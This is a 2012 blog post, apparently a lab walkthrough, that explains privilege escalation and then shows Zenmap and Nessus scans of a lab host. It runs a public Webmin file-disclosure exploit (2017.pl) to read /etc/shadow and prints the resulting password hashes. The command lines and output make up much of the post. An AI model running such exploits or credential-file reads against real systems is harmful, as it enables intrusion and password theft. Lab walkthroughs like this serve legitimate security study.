PRIVILEGE ESCALATION

Posted by Dedi Kurniawan on Monday, January 30, 2012 at 10:39 AM
OK  GUIS
what is a privilege Escalation?

Privilege Escalation is Attempy to gain privilege (access right) of other user can be a level equal or superior/root/etc.



Privilege escalation means a user receives privileges they are not entitled to. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. It usually occurs when a system has a bug that allows security to be bypassed or, alternatively, has flawed design assumptions about how it will be used. Privilege escalation occurs in two forms:

  • Vertical privilege escalation, also known as privilege elevation, where a lower privilege user or application accesses functions or content reserved for higher privilege users or applications (e.g. Internet Banking users can access site administrative functions or the password for smartphone can be bypassed.)
  • Horizontal privilege escalation, where a normal user accesses functions or content reserved for other normal users (e.g. Internet Banking User A accesses the Internet bank account of User B)


 

Impormation Gathering and Service Enumeration

First open Zenmap and input ip address


From the picture above we can get the names, and what operating system is used to see port we click porths/hosts adjacent to nmap it will appear as below.




From the picture above we can know what services are running
such as its service port 22 ssh version 4.6pl Open SSH.
But here we try to use its service port 10000 Http version Miniserv.0.01
  

Vulnerability Assessment


Vulnerability Assessment to find out we are using nessus step is the same as I published yesterday, first we loggin nessus and click scan, add, Input name, change policy, select internal network scan, scan target input 192.168.0.21 and click launch scan.


Next click 192.168.0.21 to see vulner




There we see in point vulner its ssh protocol tcp and now click ssh to see name vulner .




Ok now click download report and open wear HTML






The red line above shows vulner point that is easy to entered.


Explotation and Reading  /etc/shadow
OK guis next open Xploid db and type command as below 

root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin

Description Path

--------------------------------------------------------------------------- -------------------------

Webmin BruteForce and Command Execution Exploit /multiple/remote/705.pl

Webmin Web Brute Force v1.5 (cgi-version) /multiple/remote/745.cgi

Webmin BruteForce + Command Execution v1.5 /multiple/remote/746.pl

Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit /multiple/remote/1997.php

Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl

phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt

phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt

phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt

phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt

phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt

root@bt:/pentest/exploits/exploitdb# ls

blaCk_deviL files.csv platforms searchsploit

root@bt:/pentest/exploits/exploitdb# ls platforms

16284.rb 16381.rb 16428.rb 16475.rb 16522.rb 16569.rb 16616.rb 16663.rb 16710.rb 16761.rb 16812.rb 18108.rb

16286.rb 16382.rb 16429.rb 16476.rb 16523.rb 16570.rb 16617.rb 16664.rb 16711.rb 16762.rb 16813.rb 18109.rb

root@bt:/pentest/exploits/exploitdb# perl platforms//multiple/remote/2017.pl

Usage: platforms//multiple/remote/2017.pl <url> <port> <filename> <target>

TARGETS are

0 - > HTTP

1 - > HTTPS

Define full path with file name

Example: ./webmin.pl blah.com 10000 /etc/passwd

root@bt:/pentest/exploits/exploitdb# perl platforms//2017/remote/2017.pl

Can't open perl script "platforms//2017/remote/2017.pl": No such file or directory

root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl 192.168.0.21 10000 /etc/shadow 0

WEBMIN EXPLOIT !!!!! coded by UmZ!

Comments and Suggestions are welcome at umz32.dll [at] gmail.com

Vulnerability disclose at securitydot.net

I am just coding it in perl 'cuz I hate PHP!

Attacking 192.168.0.21 on port 10000!

FILENAME: /etc/shadow



FILE CONTENT STARTED

-----------------------------------

root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::

daemon:*:14040:0:99999:7:::

bin:*:14040:0:99999:7:::

sys:*:14040:0:99999:7:::

sync:*:14040:0:99999:7:::

games:*:14040:0:99999:7:::

man:*:14040:0:99999:7:::

lp:*:14040:0:99999:7:::

mail:*:14040:0:99999:7:::

news:*:14040:0:99999:7:::

uucp:*:14040:0:99999:7:::

proxy:*:14040:0:99999:7:::

www-data:*:14040:0:99999:7:::

backup:*:14040:0:99999:7:::

list:*:14040:0:99999:7:::

irc:*:14040:0:99999:7:::

gnats:*:14040:0:99999:7:::

nobody:*:14040:0:99999:7:::

dhcp:!:14040:0:99999:7:::

syslog:!:14040:0:99999:7:::

klog:!:14040:0:99999:7:::

mysql:!:14040:0:99999:7:::

sshd:!:14040:0:99999:7:::

vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::

obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::

osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::

yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::



-------------------------------------

root@bt:/pentest/exploits/exploitdb# root@bt:/pentest/exploits/exploitdb# perl platforms//multiple/remote/2017.pl

bash: root@bt:/pentest/exploits/exploitdb#: No such file or directory

root@bt:/pentest/exploits/exploitdb# Usage: platforms//multiple/remote/2017.pl <url> <port> <filename> <target>

bash: syntax error near unexpected token `<'

 From this command perl platforms/multiple/remote/2017.pl 192.168.0.21 10000 / etc / shadow 0 we find there are 5 user and password.




Monday, January 30, 2012

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)